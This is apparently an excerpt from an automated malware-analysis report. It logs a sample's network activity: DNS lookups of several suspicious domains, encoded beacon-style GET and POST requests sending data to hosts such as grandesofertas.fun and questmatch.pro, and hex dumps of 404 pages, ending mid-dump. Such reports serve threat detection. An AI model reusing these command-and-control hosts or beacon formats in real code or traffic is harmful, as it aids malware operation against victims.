                Source: global trafficHTTP traffic detected: GET /ipd6/?wVb0=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&0r=XzjtrBPP HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficDNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global trafficDNS traffic detected: DNS query: www.sankan-fukushi.info
                Source: global trafficDNS traffic detected: DNS query: www.conansog.shop
                Source: global trafficDNS traffic detected: DNS query: www.beythome.online
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.callyur.shop
                Source: unknownHTTP traffic detected: POST /5rfk/ HTTP/1.1Host: www.grandesofertas.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeContent-Length: 217Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.grandesofertas.funReferer: http://www.grandesofertas.fun/5rfk/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)Data Raw: 77 56 62 30 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 51 34 64 6c 42 61 66 6e 62 43 43 38 46 59 56 39 4e 4f 58 38 7a 4f 42 53 79 57 6e 54 44 55 43 54 6b 6e 61 4d 48 6d 4e 32 5a 38 75 69 72 76 57 4c 53 32 4c 71 42 38 6c 56 31 51 36 50 4c 52 43 68 6d 30 6f 56 46 50 6b 79 74 6c 6c 61 31 47 71 63 75 57 71 53 34 78 67 4b 6a 57 75 36 4d 66 39 58 6c 42 49 30 52 4b 51 67 70 58 4b 57 6b 4a 31 4c 76 57 2f 4d 35 37 66 4d 45 7a 70 33 6c 69 6e 46 5a 59 71 65 66 30 39 49 38 42 61 41 44 2b 6b 71 39 41 41 52 4b 48 51 4f 46 55 65 31 75 4c 49 4b 56 30 47 43 6e 50 6e 62 4c 58 68 77 6a 69 31 31 72 38 43 34 52 49 38 78 4c 34 72 6b 2b 78 47 61 42 57 75 67 53 51 3d 3d Data Ascii: wVb0=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKHQOFUe1uLIKV0GCnPnbLXhwji11r8C4RI8xL4rk+xGaBWugSQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:39:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ws1lCkjiKO0ZV4eViArTQK3vRWHTs2nG1AnsOiSIeRVTq556BXw%2BWBStqVgc5GM9HnEvtCInPQCU4Kny%2Fd44GCNTrvHSeTJIMUBuF5btHW1WzOMKOuCqNEEJ8fLVrQ5d%2BJFFamZNe8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ed628d889210f93-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:06 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:09 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:12 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 18:40:14 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Dec 2024 18:41:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-05T18:41:28.7071560Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 